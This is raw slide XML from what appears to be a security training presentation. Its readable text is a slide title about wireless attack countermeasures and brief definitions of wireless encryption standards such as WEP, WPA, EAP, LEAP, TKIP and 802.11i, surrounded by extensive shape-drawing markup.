                <a:gd name="T26" fmla="*/ 58 w 106"/>
                <a:gd name="T27" fmla="*/ 107 h 171"/>
                <a:gd name="T28" fmla="*/ 58 w 106"/>
                <a:gd name="T29" fmla="*/ 48 h 171"/>
                <a:gd name="T30" fmla="*/ 58 w 106"/>
                <a:gd name="T31" fmla="*/ 48 h 171"/>
                <a:gd name="T32" fmla="*/ 56 w 106"/>
                <a:gd name="T33" fmla="*/ 51 h 171"/>
                <a:gd name="T34" fmla="*/ 30 w 106"/>
                <a:gd name="T35" fmla="*/ 107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6" h="171">
                  <a:moveTo>
                    <a:pt x="92" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="107"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="58" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="10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4" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85398CC-3671-42F6-9759-D8B0FC0DC2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4800" y="5114109"/>
              <a:ext cx="141439" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 111"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 111"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="195">
                  <a:moveTo>
                    <a:pt x="111" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="143"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="7"/>
                    <a:pt x="96" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="33"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="37" y="59"/>
                    <a:pt x="37" y="74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37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="162"/>
                    <a:pt x="49" y="165"/>
                    <a:pt x="55" y="16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2" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="7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5" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B921BE-D4C1-4EC8-B06B-05D680FA9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846" y="5118310"/>
              <a:ext cx="140038" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 111"/>
                <a:gd name="T1" fmla="*/ 105 h 192"/>
                <a:gd name="T2" fmla="*/ 13 w 111"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 105 w 111"/>
                <a:gd name="T5" fmla="*/ 0 h 192"/>
                <a:gd name="T6" fmla="*/ 105 w 111"/>
                <a:gd name="T7" fmla="*/ 30 h 192"/>
                <a:gd name="T8" fmla="*/ 43 w 111"/>
                <a:gd name="T9" fmla="*/ 30 h 192"/>
                <a:gd name="T10" fmla="*/ 39 w 111"/>
                <a:gd name="T11" fmla="*/ 75 h 192"/>
                <a:gd name="T12" fmla="*/ 49 w 111"/>
                <a:gd name="T13" fmla="*/ 68 h 192"/>
                <a:gd name="T14" fmla="*/ 62 w 111"/>
                <a:gd name="T15" fmla="*/ 65 h 192"/>
                <a:gd name="T16" fmla="*/ 98 w 111"/>
                <a:gd name="T17" fmla="*/ 81 h 192"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 128 h 192"/>
                <a:gd name="T20" fmla="*/ 96 w 111"/>
                <a:gd name="T21" fmla="*/ 173 h 192"/>
                <a:gd name="T22" fmla="*/ 55 w 111"/>
                <a:gd name="T23" fmla="*/ 192 h 192"/>
                <a:gd name="T24" fmla="*/ 16 w 111"/>
                <a:gd name="T25" fmla="*/ 177 h 192"/>
                <a:gd name="T26" fmla="*/ 0 w 111"/>
                <a:gd name="T27" fmla="*/ 138 h 192"/>
                <a:gd name="T28" fmla="*/ 1 w 111"/>
                <a:gd name="T29" fmla="*/ 137 h 192"/>
                <a:gd name="T30" fmla="*/ 36 w 111"/>
                <a:gd name="T31" fmla="*/ 135 h 192"/>
                <a:gd name="T32" fmla="*/ 42 w 111"/>
                <a:gd name="T33" fmla="*/ 155 h 192"/>
                <a:gd name="T34" fmla="*/ 55 w 111"/>
                <a:gd name="T35" fmla="*/ 162 h 192"/>
                <a:gd name="T36" fmla="*/ 69 w 111"/>
                <a:gd name="T37" fmla="*/ 153 h 192"/>
                <a:gd name="T38" fmla="*/ 74 w 111"/>
                <a:gd name="T39" fmla="*/ 129 h 192"/>
                <a:gd name="T40" fmla="*/ 69 w 111"/>
                <a:gd name="T41" fmla="*/ 102 h 192"/>
                <a:gd name="T42" fmla="*/ 54 w 111"/>
                <a:gd name="T43" fmla="*/ 92 h 192"/>
                <a:gd name="T44" fmla="*/ 42 w 111"/>
                <a:gd name="T45" fmla="*/ 96 h 192"/>
                <a:gd name="T46" fmla="*/ 36 w 111"/>
                <a:gd name="T47" fmla="*/ 108 h 192"/>
                <a:gd name="T48" fmla="*/ 3 w 111"/>
                <a:gd name="T49" fmla="*/ 105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1" h="192">
                  <a:moveTo>
                    <a:pt x="3" y="105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39" y="75"/>
                    <a:pt x="39" y="75"/>
                    <a:pt x="39" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="72"/>
                    <a:pt x="45" y="70"/>
                    <a:pt x="49" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="66"/>
                    <a:pt x="57" y="65"/>
                    <a:pt x="62" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="65"/>
                    <a:pt x="89" y="70"/>
                    <a:pt x="98" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="92"/>
                    <a:pt x="111" y="108"/>
                    <a:pt x="111" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="146"/>
                    <a:pt x="106" y="161"/>
                    <a:pt x="96" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="186"/>
                    <a:pt x="73" y="192"/>
                    <a:pt x="55" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="192"/>
                    <a:pt x="27" y="187"/>
                    <a:pt x="16" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="168"/>
                    <a:pt x="0" y="154"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="144"/>
                    <a:pt x="38" y="150"/>
                    <a:pt x="42" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="160"/>
                    <a:pt x="50" y="162"/>
                    <a:pt x="55" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="162"/>
                    <a:pt x="66" y="159"/>
                    <a:pt x="69" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="139"/>
                    <a:pt x="74" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="117"/>
                    <a:pt x="72" y="109"/>
                    <a:pt x="69" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="96"/>
                    <a:pt x="61" y="92"/>
                    <a:pt x="54" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="92"/>
                    <a:pt x="45" y="94"/>
                    <a:pt x="42" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="99"/>
                    <a:pt x="37" y="103"/>
                    <a:pt x="36" y="108"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3" y="10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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="TextBox 161">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{958C8B45-68FD-4C11-8CCA-3AC65550BE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8709" y="4801020"/>
            <a:ext cx="2776992" cy="6697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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Attack Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326203311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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB01E6AA-16E2-441B-B2FF-144479FBFF46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438402" y="254053"/>
            <a:ext cx="7315197" cy="754987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Types of  Wireless Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Rounded Rectangle 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585417" y="4895208"/>
            <a:ext cx="2883372" cy="51189"/>
          </a:xfrm>
          <a:prstGeom prst="round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2" name="Rounded Rectangle 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8837882" y="4895460"/>
            <a:ext cx="2911935" cy="50685"/>
          </a:xfrm>
          <a:prstGeom prst="round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6" name="Rounded Rectangle 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8837882" y="2333113"/>
            <a:ext cx="2913944" cy="51188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7" name="Rounded Rectangle 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332950" y="4895208"/>
            <a:ext cx="2883374" cy="51189"/>
          </a:xfrm>
          <a:prstGeom prst="round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1" name="Rounded Rectangle 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332951" y="2334499"/>
            <a:ext cx="2883373" cy="48416"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:pr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2" name="Rounded Rectangle 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585416" y="2333113"/>
            <a:ext cx="2883374" cy="51189"/>
          </a:xfrm>
          <a:prstGeom prst="round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4CA97847-D8DF-4596-B6DA-B55B6C9DC2EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332951" y="2532596"/>
            <a:ext cx="3520290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 IEEE amendment that specifies security mechanisms for 802.11 wireless networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA0DE0D-4298-4174-908F-42E1E98B1C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4638" y="1747759"/>
            <a:ext cx="240052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802.11i</a:t>
            </a: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259AB823-7906-42BA-83FE-425C5922E361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242810" y="1747759"/>
            <a:ext cx="904880" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln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C0504D">
                    <a:lumMod val="75000"/>
                  </a:srgb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WEP</a:t>
            </a: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0435FA5F-0280-423F-9D0E-196A4F9F28D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585417" y="2532596"/>
            <a:ext cx="2883372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 encryption algorithm for IEEE 802.11 wireless networks</a:t>
            </a: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DB9DAF3F-E52B-4AA6-8062-FBD029CDE9F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9492520" y="1747759"/>
            <a:ext cx="707245" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln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BBB59">
                    <a:lumMod val="75000"/>
                  </a:srgb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EAP</a:t>
            </a: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038BEC5D-0148-4E9A-A674-4AB4449F574D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8837882" y="2532596"/>
            <a:ext cx="3036258" cy="120032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Supports multiple authentication methods, such as token cards, Kerberos, and certificates</a:t>
            </a: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D93D3632-CBF1-42A0-BAAF-6D33119962AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975610" y="4310696"/>
            <a:ext cx="936475" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln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LEAP </a:t>
            </a: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B31E0E6C-E215-4443-AD69-0AFCCB19D7A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332950" y="5138088"/>
            <a:ext cx="3026737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proprietary version of EAP developed by Cisco</a:t>
            </a:r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517A64C3-1306-4AF4-B9D4-852B9FDB3192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211957" y="4310696"/>
            <a:ext cx="2301802" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln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47AAC5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WPA </a:t>
            </a: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4E29327C-2052-4CA1-92F0-4CEA8BA71A88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585416" y="5138088"/>
            <a:ext cx="3491783" cy="120032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 advanced wireless encryption protocol using TKIP and MIC to provide stronger encryption and authentication</a:t>
            </a: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238D53BE-7565-41DC-A4F7-6553F26832DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8837882" y="5138088"/>
            <a:ext cx="2911936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security protocol used in WPA as a replacement for WEP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Rectangle 123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F1065E0-3CF8-4EAA-AA44-DCED6E0DB61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9476280" y="4310696"/>
            <a:ext cx="838691" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln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79646">
                    <a:lumMod val="75000"/>
                  </a:srgb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TKIP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414CB4A7-DE70-4F32-8049-E406F8FF5D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4585416" y="1683533"/>
            <a:ext cx="566928" cy="565293"/>
            <a:chOff x="4585416" y="1683533"/>
            <a:chExt cx="566928" cy="565293"/>
          </a:xfrm>
        </p:grpSpPr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B32F5F8C-C1C2-4BBD-9430-51A38AF40702}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4585416" y="1683533"/>
              <a:ext cx="566928" cy="565293"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2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0" name="Freeform 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9F6523-C416-426F-83A8-48019642F69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76229" y="1815782"/>
              <a:ext cx="185302" cy="300794"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126553 w 284"/>
                <a:gd name="T1" fmla="*/ 51794 h 497"/>
                <a:gd name="T2" fmla="*/ 126553 w 284"/>
                <a:gd name="T3" fmla="*/ 51794 h 497"/>
                <a:gd name="T4" fmla="*/ 126553 w 284"/>
                <a:gd name="T5" fmla="*/ 27923 h 497"/>
                <a:gd name="T6" fmla="*/ 63500 w 284"/>
                <a:gd name="T7" fmla="*/ 0 h 497"/>
                <a:gd name="T8" fmla="*/ 0 w 284"/>
                <a:gd name="T9" fmla="*/ 27923 h 497"/>
                <a:gd name="T10" fmla="*/ 0 w 284"/>
                <a:gd name="T11" fmla="*/ 51794 h 497"/>
                <a:gd name="T12" fmla="*/ 43377 w 284"/>
                <a:gd name="T13" fmla="*/ 111694 h 497"/>
                <a:gd name="T14" fmla="*/ 0 w 284"/>
                <a:gd name="T15" fmla="*/ 171594 h 497"/>
                <a:gd name="T16" fmla="*/ 0 w 284"/>
                <a:gd name="T17" fmla="*/ 199518 h 497"/>
                <a:gd name="T18" fmla="*/ 63500 w 284"/>
                <a:gd name="T19" fmla="*/ 223388 h 497"/>
                <a:gd name="T20" fmla="*/ 126553 w 284"/>
                <a:gd name="T21" fmla="*/ 199518 h 497"/>
                <a:gd name="T22" fmla="*/ 126553 w 284"/>
                <a:gd name="T23" fmla="*/ 171594 h 497"/>
                <a:gd name="T24" fmla="*/ 83176 w 284"/>
                <a:gd name="T25" fmla="*/ 111694 h 497"/>
                <a:gd name="T26" fmla="*/ 126553 w 284"/>
                <a:gd name="T27" fmla="*/ 51794 h 497"/>
                <a:gd name="T28" fmla="*/ 19676 w 284"/>
                <a:gd name="T29" fmla="*/ 27923 h 497"/>
                <a:gd name="T30" fmla="*/ 19676 w 284"/>
                <a:gd name="T31" fmla="*/ 27923 h 497"/>
                <a:gd name="T32" fmla="*/ 63500 w 284"/>
                <a:gd name="T33" fmla="*/ 15763 h 497"/>
                <a:gd name="T34" fmla="*/ 106877 w 284"/>
                <a:gd name="T35" fmla="*/ 27923 h 497"/>
                <a:gd name="T36" fmla="*/ 110901 w 284"/>
                <a:gd name="T37" fmla="*/ 31977 h 497"/>
                <a:gd name="T38" fmla="*/ 63500 w 284"/>
                <a:gd name="T39" fmla="*/ 43687 h 497"/>
                <a:gd name="T40" fmla="*/ 15651 w 284"/>
                <a:gd name="T41" fmla="*/ 31977 h 497"/>
                <a:gd name="T42" fmla="*/ 19676 w 284"/>
                <a:gd name="T43" fmla="*/ 27923 h 497"/>
                <a:gd name="T44" fmla="*/ 67525 w 284"/>
                <a:gd name="T45" fmla="*/ 111694 h 497"/>
                <a:gd name="T46" fmla="*/ 67525 w 284"/>
                <a:gd name="T47" fmla="*/ 111694 h 497"/>
                <a:gd name="T48" fmla="*/ 91225 w 284"/>
                <a:gd name="T49" fmla="*/ 147724 h 497"/>
                <a:gd name="T50" fmla="*/ 110901 w 284"/>
                <a:gd name="T51" fmla="*/ 171594 h 497"/>
                <a:gd name="T52" fmla="*/ 110901 w 284"/>
                <a:gd name="T53" fmla="*/ 187357 h 497"/>
                <a:gd name="T54" fmla="*/ 67525 w 284"/>
                <a:gd name="T55" fmla="*/ 159434 h 497"/>
                <a:gd name="T56" fmla="*/ 59475 w 284"/>
                <a:gd name="T57" fmla="*/ 159434 h 497"/>
                <a:gd name="T58" fmla="*/ 15651 w 284"/>
                <a:gd name="T59" fmla="*/ 187357 h 497"/>
                <a:gd name="T60" fmla="*/ 15651 w 284"/>
                <a:gd name="T61" fmla="*/ 171594 h 497"/>
                <a:gd name="T62" fmla="*/ 35775 w 284"/>
                <a:gd name="T63" fmla="*/ 147724 h 497"/>
                <a:gd name="T64" fmla="*/ 59475 w 284"/>
                <a:gd name="T65" fmla="*/ 111694 h 497"/>
                <a:gd name="T66" fmla="*/ 35775 w 284"/>
                <a:gd name="T67" fmla="*/ 79717 h 497"/>
                <a:gd name="T68" fmla="*/ 15651 w 284"/>
                <a:gd name="T69" fmla="*/ 51794 h 497"/>
                <a:gd name="T70" fmla="*/ 15651 w 284"/>
                <a:gd name="T71" fmla="*/ 39633 h 497"/>
                <a:gd name="T72" fmla="*/ 63500 w 284"/>
                <a:gd name="T73" fmla="*/ 51794 h 497"/>
                <a:gd name="T74" fmla="*/ 110901 w 284"/>
                <a:gd name="T75" fmla="*/ 39633 h 497"/>
                <a:gd name="T76" fmla="*/ 110901 w 284"/>
                <a:gd name="T77" fmla="*/ 51794 h 497"/>
                <a:gd name="T78" fmla="*/ 91225 w 284"/>
                <a:gd name="T79" fmla="*/ 79717 h 497"/>
                <a:gd name="T80" fmla="*/ 67525 w 284"/>
                <a:gd name="T81" fmla="*/ 111694 h 49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84" h="497">
                  <a:moveTo>
                    <a:pt x="283" y="115"/>
                  </a:moveTo>
                  <a:lnTo>
